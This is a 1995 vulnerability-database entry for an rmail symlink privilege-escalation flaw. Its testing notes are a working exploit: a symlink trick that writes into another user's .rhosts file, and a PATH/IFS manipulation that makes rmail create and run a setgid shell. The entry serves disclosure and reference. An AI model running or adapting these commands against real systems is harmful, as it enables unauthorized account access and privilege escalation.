rmail Symlink Local Privilege Escalation

1995-09-01T00:00:00
ID OSVDB:430
Type osvdb
Reporter OSVDB
Modified 1995-09-01T00:00:00

Description

Manual Testing Notes

ln -s ~joe/.rhosts /tmp/mbox.joe echo "localhost yourname" | rmail joe

--

mkdir /tmp/.rmail cd /tmp/.rmail

cat <<EOF>usr cp sh mailsh chmod 2777 mailsh EOF chmod 777 usr ln -s /bin/sh .

Set PATH, IFS, and run rmail.

setenv PATH .:$PATH setenv IFS / echo "cheezy mail hack" | rmail joeuser@nohost.com unsetenv IFS

minor cleanup.

rm -f usr sh echo "Attempting to run sgid shell." ./mailsh

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1995_3/0219.html